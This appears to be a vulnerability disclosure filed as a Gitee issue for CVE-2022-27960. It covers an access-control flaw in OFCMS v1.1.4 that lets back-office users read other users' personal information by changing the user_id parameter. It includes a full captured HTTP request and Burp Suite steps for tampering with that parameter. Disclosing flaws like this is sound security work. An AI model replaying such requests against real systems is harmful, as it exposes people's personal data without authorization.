Headline
CVE-2022-27960: There is a Information disclosure vulnerability exists in ofcms · Issue #I4Z8SS · 欧福/ofcms - Gitee.com
Insecure permissions configured in the user_id parameter at SysUserController.java of OFCMS v1.1.4 allows attackers to access and arbitrarily modify users’ personal information.
[Suggested description]
Information leakage vulnerability exists in the ofCMS background. As the detail method in SysUserController does not securely limit the user_id parameter passed, any background user can view the personal information of other users by modifying the value of user_id.
[Vulnerability Type]
Information disclosure
[Vendor of Product]
https://gitee.com/oufu/ofcms
[Affected Product Code Base]
v1.1.4
[Affected Component]
POST /ofcms/admin/system/user/detail.json HTTP/1.1
Host: localhost:7000
Content-Length: 54
sec-ch-ua: " Not A;Brand";v="99", “Chromium";v="92”
Accept: application/json, text/javascript, /; q=0.01
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:7000
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:7000/ofcms/admin/f.html?p=system/user/edit.html&topMode=readonly&user_id=3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=B07DD54FA7B0F4A0B6F042CBEFD725E0
Connection: close
p=system%2Fuser%2Fedit.html&topMode=readonly&user_id=1
[Attack Type]
Remote
[Vulnerability to prove]
1.Enter the system background, open the Burpsuite agent function, click “Basic Information”
2.To obtain captured packet data,change the value of user_id to 1.
3.Click send data package, popup user basic information window, but the current user’s input has not been transmitted.
4.To obtain captured packet data, change the value of user_id to 1.
5.The administrator successfully obtains the account information after sending the data packet.